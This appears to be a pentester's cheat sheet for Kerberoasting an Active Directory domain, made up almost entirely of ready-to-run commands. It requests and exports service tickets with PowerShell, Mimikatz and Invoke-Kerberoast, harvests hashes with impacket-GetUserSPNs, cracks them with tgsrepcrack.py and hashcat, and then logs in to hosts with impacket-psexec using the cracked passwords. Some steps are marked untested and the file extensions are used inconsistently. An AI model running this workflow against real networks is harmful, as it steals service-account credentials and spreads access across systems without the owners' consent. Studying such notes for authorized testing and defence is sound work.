Kerberoasting

Crack the Kerberos service ticket to obtain the clear text password for the service account. The service ticket is encrypted using the SPN’s password hash.

No administrative privileges required.

Install the kerberoast package on Kali

sudo apt update && sudo apt install kerberoast

Manually

On Windows, open a command prompt. Request the service ticket and export it.

powershell
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<SPN>'
klist

Download the service ticket with Mimikatz.

mimikatz.exe "kerberos::list /export" exit

Or (not tested)

/usr/share/powershell-empire/empire/server/data/module_source/credentials/Invoke-Kerberoast.ps1
powershell
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat

Using Invoke-Kerberoast

Get SPNs

On Kali

impacket-GetUserSPNs ${DOMAIN}/${USER} -outputfile SPNs.txt

Seen in a demo.

-request: Requests TGS for users and output them in JtR/hashcat format (default False)

impacket-GetUserSPNs -request ${DOMAIN}/${USER} > kerberoasting.txt

On Windows

cd impacket-master/examples
python3 GetUserSPNs <domain>/<username> -outputfile SPNs.txt

Extract ticket for a specific SPN

grep -i <spn> SPNs.txt > <spn>.kirby

Crack the tickets

Run tgsrepcrack.py, supplying a wordlist and the downloaded service ticket to crack the password.

WL=/home/kali/wl.txt
TICKET_FILE=<filename>.kirbi
python3 /usr/share/kerberoast/tgsrepcrack.py $WL $TICKET_FILE

Using Hashcat

HASH=<ticket>.kirby
TYPE=13100
WL=/usr/share/wordlists/rockyou.txt

hashcat -O -m $TYPE -a 0 $HASH $WL

Hash format:

$krb5tgs$23$*<USER>$<DOMAIN>$<SPN>*$TICKET

When tickets are cracked, try Impacket. To find user name, see hash format above or list all domain users (net user /domain).

impacket-psexec ${DOMAIN}/${USER}:${PASS}@${IP}